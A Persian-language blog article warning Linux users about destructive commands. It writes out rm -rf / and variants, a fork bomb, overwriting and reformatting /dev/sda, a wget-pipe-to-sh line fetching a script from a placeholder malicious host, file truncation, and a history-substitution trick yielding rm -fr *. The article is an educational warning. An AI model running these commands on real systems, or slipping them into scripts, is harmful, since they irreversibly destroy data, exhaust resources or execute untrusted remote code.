دستورات خطرناک لینوکس


اخطار: از اجرای و تست این دستورات روی سرور، سیستم خانگی و یا هر سیستم عاملی که حاوی اطلاعات مهم می باشد خودداری نمائید.

دستور مخرب اول:

1)    rm 	command in Linux is used to delete files. 2)    rm -r 	command deletes the folder recursively, even the empty folder. 3)    rm -f 	command removes ‘Read only File’ without asking. 4)    rm -rf / 	: Force deletion of everything in root directory. 5)    rm -rf * 	: Force deletion of everything in current directory/working directory. 6)    rm -rf . 	: Force deletion of current folder and sub folders. 

مورد اول: این دستور جهت حذف اطلاعات مورد استفاده قرار می گیرد.

مورد دوم: این دستور تمام پوشه ها و زیر پوشه های موجود در مسیر مربوطه را حذف مینماید. (حتی پوشه های خالی)

مورد سوم: این دستور بدون تائیدیه، کل دیتا را حذف مینماید.

مورد چهارم: این دستور تمامی اطلاعات سرور را حذف می نماید.

مورد پنجم: این دستور تمامی اطلاعات پوشه ی فعلی را حذف می نماید.

مورد ششم: این دستور پوشه و زیر پوشه هایی که داخل آن قرار دارید را حذف مینماید.

 

دستور مخرب دوم:

این دستور با نام Fork Bomb شناخته می شود و کل Resource سرور را اشغال نموده و پس از اجرای آن، در نهایت ناچار به ریبوت سرور خواهید شد.

این دستور به شرح ذیل است:

:(){:|:&};: 

توضیحات کاملی در ارتباط با این دستور در این لینک قابل مشاهده است.

 

دستور مخرب سوم:

command > /dev/sda 

این Command داده های خروجی دستور شما را به جای تمام اطلاعات و دیتا در اولین هارد دیسک رایت میکند. این مورد باعث تخریب کل فایل های سیستمی شما گردیده و هنگامی که اجرا شود، در صورت عدم توقف، باعث حذف اطلاعات و غیر قابل بازگشت بودن آنها خواهد شد. (به جای عبارت command می تواند هر دستوری قرار بگیرد.)

به طور مثال، دستور ذیل اطلاعات یک پوشه را به همراه تمامی اطلاعات آن به طور غیر قابل بازگشتی به یک مکان نا مشخص ارسال می نماید.

mv folder /dev/null 

 

دستور مخرب چهارم:

mkfs.ext3 /dev/sda 

این دستور، هارد دیسک اول سرور را فرمت نموده و آن را با فرمت جدید ext3 مجدد می سازد. لازم به ذکر است این دستور باعث حذف غیر قابل بازگشت اطلاعات هارد دیسک اول شما خواهد شد.

 

دستور مخرب پنجم:

wget http://malicious_source -O- | sh 

این دستور مخرب که بیشتر توسط هکرها استفاده می شود، یک فایل آلوده و یا یک اسکریپت مخرب را از یک سایت دانلود نموده و با استفاده از دستور sh ، بلافاصله اقدام به اجرای آن می نماید. لذا در صورت مشاهده این دستور، حتما از اجرای آن اجتناب نموده و فایل اسکریپت را قبل از اجرا بررسی نمائید.

 

دستور مخرب ششم:

> file 

این دستور محتوای file را به صورت کامل حذف می نماید و یک فایل خالی را بجا میگذارد. در صورتی که فایل های کانفیگ اصلی سرور در این دستور قرار بگیرند، می توانند برای سرور مشکل ساز باشند. لذا به هنگام استفاده از آن نهایت دقت را داشته باشید.

 

دستور مخرب هفتم:

\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7 

از اجرای دستوراتی که به صورت بالا می باشند، در صورت عدم آگاهی از Source اصلی آن جدا خودداری نمائید. به طور مثال ممکن است دستور rm -fr به صورت hex کدگذاری شود و خروجی آن جهت اجرا همانند کد بالا در یک اسکریپت قرار گیرد و با اجرای آن، اطلاعات مهمی از دست برود.

 

دستور مخرب هشتم:

regux@localhost:~/Desktop$ lll bash: lll: command not found  regux@localhost:~/Desktop$ ^lll^ll  ll total 7489440  drwxr-xr-x 2 regux regux 36864 Nov 13  2012 101MSDCF  -rw-r--r-- 1 regux regux 206833 Nov  5 15:27 regux.jpg  -rw-r--r-- 1 regux regux 158951 Nov  5 15:27 regux2.jpg  -rw-r--r-- 1 regux regux 90624 Nov  5 12:59 Untitled 1.doc 

فرض کنید دستور ll را اشتباها به صورت lll وارد نموده اید. در نتیجه با خطای اجرای دستور مواجه شدید. حال بجای اینکه مجدد دستور صحیح را تایپ نمائید، می توانید تنها کلمه lll را با استفاده از فرمت بالا به ll تصحیح نمائید. به طور کلی می توانید با این فرمت، کامند قبلی را اصلاح نموده و بدون فراخوانی مجدد آن اجرا نمائید. این مورد در دستورات بلند بسیار پرکاربرد می باشد. حال تصور کنید به جای ll از عبارت rm -fr استفاده گردد. به صورت ذیل:

[root@regux test]# ^lll^rm -fr *^ rm -fr * 

این دستور باعث حذف کل اطلاعات دایرکتوری فعلی خواهد شد. لذا می بایست در استفاده از این دستور و کاراکتر ^ نهایت دقت و توجه را داشته باشید.

 

نویسنده: میلاد خوشدل

میلاد خوشدل

در حوزه‌ی امنیت وب و شبکه فعالیت می کند، عاشق پارکور است و مدیریت دیتاسنتر، امن سازی شبکه های مخابراتی و کابلی و برنامه نویسی وب و موبایل از تجارب کاری او می باشد. او در حال حاضر بنیانگذار ریجاکس است.

نظر خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

12 − یازده =


تگ های html مجاز به استفاده می باشند: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

ارسال یک پیام